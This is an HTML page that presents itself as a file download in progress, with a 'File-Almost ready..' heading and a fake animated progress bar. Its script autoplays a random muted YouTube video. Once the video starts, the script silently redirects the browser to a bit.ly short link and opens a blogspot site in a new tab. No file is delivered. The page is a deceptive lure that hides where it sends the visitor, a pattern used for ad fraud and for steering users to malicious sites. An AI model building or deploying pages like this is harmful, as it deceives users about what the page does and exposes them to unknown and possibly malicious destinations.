<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 1.1//EN">
<html> 
<head>
  <meta charset="utf-8" />
  <style>
    .container {
      display: flex;
      justify-content: center;
      align-items: center;
    }

    #myProgress {
      position: relative;
      height: 10px;
      width: 1110%;
      border: 10px solid #f4a261;
      border-radius: 15px;
    }

    #myProgress #myBar {
      position: absolute;
      background-color: #409209;
      width: 0px;
      height: 10px;
      border-radius: 15px;
      animation: myProgress 4s infinite linear;
    }

    @keyframes myProgress {
      0% {
        width: 0%;
      }

      25% {
        width: 50%;
      }

      50% {
        width: 75%;
      }

      75% {
        width: 85%;
      }

      100% {
        width: 100%;
      }
    }
  </style>
</head>

<body>

  <center>
    <h4 style="color:blue;">File-Almost ready..</h4>
    <div class="container">
      <div id="myProgress">
        <div id="myBar"></div>
      </div>
    </div>
    <!-- 1. The <iframe> (and video player) will replace this <div> tag. -->
    <div id="player"></div>


    <script>
      // 2. This code loads the IFrame Player API code asynchronously.
      var tag = document.createElement('script');

      tag.src = "https://www.youtube.com/iframe_api";
      var firstScriptTag = document.getElementsByTagName('script')[0];
      firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);


      function rotateYT() {
        var videos = [
          '0ulnVA7oqjo',
          'WFUmP9IrzYo',
          '2NGOs-zoUak',
          'T4Xpt38y44c',
          'IcncjdyfyDg',
          '0Vpe86K3JuI',
          'TK6mawGw7aI',
          'd-dP39phOFQ',
          'OqxKbRyNGwQ',
          'Yv1SdaViMEo',
        ];

        var index = Math.floor(Math.random() * videos.length);
        return videos[index];
      }
      // 3. This function creates an <iframe> (and YouTube player)
      //    after the API code downloads.
      var player;
      function onYouTubeIframeAPIReady() {
        var videoID = rotateYT();
        player = new YT.Player('player', {
          height: '250',
          width: '330',
          videoId: videoID,
          playerVars: {
            'playsinline': 1, 'controls': 0, 'mute': 1, 'start': 0, 'end': 5
          },
          events: {
            'onReady': onPlayerReady,
            'onStateChange': onPlayerStateChange
          }
        });
      }

      // 4. The API will call this function when the video player is ready.
      function onPlayerReady(event) {
        event.target.playVideo();
      }

      // 5. The API calls this function when the player's state changes.
      //    The function indicates that when playing a video (state=1),
      //    the player should play for six seconds and then stop.
      var done = false;
      function onPlayerStateChange(event) {
        if (event.data == YT.PlayerState.PLAYING && !done) {
          setTimeout(stopVideo, 10000);
          done = true;
          window.location.href = ('https://bit.ly/3o9AeMm');
window.open ('https://hintecher.blogspot.com/',"_newtab");
        }
      }
      function stopVideo() {
        player.stopVideo();
      }
    </script>
  </center>
</body>

</html>